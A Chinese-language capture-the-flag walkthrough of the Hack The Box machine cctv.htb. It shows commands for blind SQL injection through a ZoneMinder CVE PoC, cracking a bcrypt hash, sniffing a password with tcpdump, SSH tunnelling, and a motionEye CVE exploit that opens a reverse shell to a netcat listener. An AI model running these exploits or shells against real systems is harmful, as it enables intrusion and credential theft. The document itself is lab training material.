Linux机器,80 22端口

初始页面是没什么资产信息的,点这个登录会跳到ZoneMinder

弱口令手测一下发现是admin admin,登录后有版本信息

第一个试了不行,打的第二个CVE

CVE-2024-51482

https://github.com/plur1bu5/CVE-2024-51482-PoC

python zm.py -t cctv.htb -u admin -p admin -D zm -T Users --dump --threads 20

前面还需要测数据库名然后表,这里都是默认的,直接dump,盲注很man~

三个,通常来说都是爆第二个mark为普通用户.这里都爆了一下,第一个admin没有,第三个就是admin密码,第二个

hashcat -m 3200 '$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG.' /usr/share/wordlists/rockyou.txt
opensesame

凭证收集

发现拿不了user.txt,需要一个sa_mark的密码才行.查看开放端口

可以先问问AI,然后简单点的话直接用curl 测试一下,发现里面有一个motion

存在rce漏洞,不过需要凭证,找一下凭证在/etc/motioney/motion.conf

SHA-1哈希,试了下rockyou不行. 停滞~~

这里直接上linpeas.sh

GitHub - peass-ng/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
Privilege Escalation Awesome Scripts SUITE (with colors) - peass-ng/PEASS-ng

Linux服务

除了关注常见sudo -l 还有suid文件之外,还可以关注一下root启动的一些服务,还有一些奇奇怪怪不常见的服务

这里发现原来这个motioneye是root启动的,如果说能够rce就直接是root了.

systemctl cat motioneye.service

细看下没啥东西

TCPdump

当前用户还能用这个,tcpdump可以抓机器网络通信的包,这个东西通常只有root才能用

最后发现根本找不到有关sa_mark的任何信息,如果之前细心找或者直接暴力搜索,会发现有一个日志文件里面有登录日志

grep -R "sa_mark" / 2>/dev/null
这个是实时的时间,所以说肯定是一个计划任务在跑,估计是这个zm程序什么的

666,还有计划任务执行自动登录,结合上面不常见的tcpdump

tcpdump -i any -A | grep -i -B5 -A5 "sa_mark"
X1l9fx1ZjS7RZb

user.txt

ssh sa_mark@cctv.htb 
X1l9fx1ZjS7RZb

cat ~/user.txt

并发现神秘pdf

这里大概意思就是咋们换一个新网站zm了,然后密码不变,所以说这里猜测密码沿用,那个motion的密码也是这个

CVE-2025-60787

这里先前的motion是内网,这里需要做一下代理,简单点就只代理一个端口就行,刚好是ssh的

ssh -L 8765:127.0.0.1:8765 sa_mark@cctv.htb

https://github.com/lil0xplorer/CVE-2025-60787_PoC

python CVE-2025-60787.py -t http://127.0.0.1:8765 -p X1l9fx1ZjS7RZb -lh 10.10.xx.xx -lp 1234

另一个terminal 执行  nc -lvvp 1234

root.txt